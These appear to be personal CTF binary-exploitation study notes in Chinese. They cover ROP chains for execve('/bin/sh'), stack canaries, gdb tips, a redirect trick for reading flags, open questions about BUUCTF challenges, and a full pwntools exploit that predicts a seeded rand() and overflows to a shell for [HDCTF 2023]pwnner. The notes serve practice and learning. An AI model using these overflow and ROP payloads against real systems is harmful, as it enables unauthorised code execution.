u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
ROPgadget --binary rop --ropchain
可以自动生成ROPChain
关闭canary:-fno-stack-protector
关闭pie:-no-pie
systemcall_64:
rax->0x3b rdi->/bin/sh rsi->0 rdx->0
syscall:ROPgadget --binary 文件名 | grep syscall
payload1=b'a'*(0x10)+p64(rdi)+p64(0)+p64(rsi)+p64(buf/*写入/bin/sh的地址,如bss段*/)+p64(rdx)+p64(8)+p64(elf.sym['read'])#调用read函数,将/bin/sh写入buf
payload2=b'a'*(0x10)+p64(rdi)+p64(buf)+p64(rsi)+p64(0)+p64(rdx)+p64(0)+p64(syscall)
gdb中:
search aaaa:寻找输入数据所在的栈地址
s:进入当前执行函数,当call 函数 时使用。
canary:
八个字节且随机生成,末尾永远是\x00
查看fs寄存器的内容:
在gdb中 i r fs_base #得到fs_base 十六进制数据 十进制数据
接着 x/40gx 刚得到的十六进制数据
执行 strcmp 的时候,rdx 会被设置为将要被比较的字符串的长度,所以我们可以找到 strcmp 函数,从而来控制 rdx。
close(0):关闭标准输入
close(1):关闭标准输出
close(2):关闭标准错误
exec 1>&0:对stdout重定向,把标准输出重定向到标准输入,&+文件描述符,可以代指该文件,在同一个进程里,标准输入和标准输出都是指向相同的终端。
tac fla* >&2
"tac"是一个用于逆序输出文本文件内容的命令,"fl*"是一个通配符模式,代表以"fl"开头的文件名。">&2"是重定向语法,将命令的输出重定向到标准错误。
标准错误(Standard Error,通常缩写为stderr)是计算机操作系统中的一种输出流。它用于将程序或命令执行过程中产生的错误信息输出到屏幕或日志文件中,以便进行错误诊断和调试。
总结来说,标准错误是用于输出程序或命令执行过程中的错误信息的流,它与标准输出相互独立,可用于错误诊断、调试和记录错误信息。
question:
BUU第三页第十二题wdb_2018_2nd_easyfmt远程不通
BUU第二页第30题picoctf_2018_shellcode动调get无法输入。
BUU第二页29题pwnable_start,为什么返回到write函数可以打印栈地址。
[Black Watch 入群题]PWN本地打不通
本地ret2libc时栈对齐ret的使用,什么时候需要在main前加上ret。
BUU 第一页倒数第二题ciscn_2019_s_3
偏移值的查找
BUU 第二页第四题mrctf2020_shellcode
汇编代码的阅读
BUU第二页倒数第四题gyctf_2020_borrowstack
只能用onegadget,不能用ret2libc,20个ret的使用
难题:
BUU第二页倒数第三排第三题[ZJCTF 2019]Login
[HDCTF 2023]pwnner
vuln函数存在栈溢出漏洞,存在后面函数。
想要执行栈溢出,必须使v0等于随机数。
srand(0x39u)生产伪随机数,通过调用ctypes库得到伪随机数
exp
from pwn import*
from ctypes import*
io= remote('node5.anna.nssctf.cn',28354)
elf=cdll.LoadLibrary("libc.so.6")
elf.srand(0x39)
getshell=0x4008B2
io.sendline(str(elf.rand()))
payload=b'a'*(0x40+8)+p64(getshell)
io.sendline(payload)
io.interactive()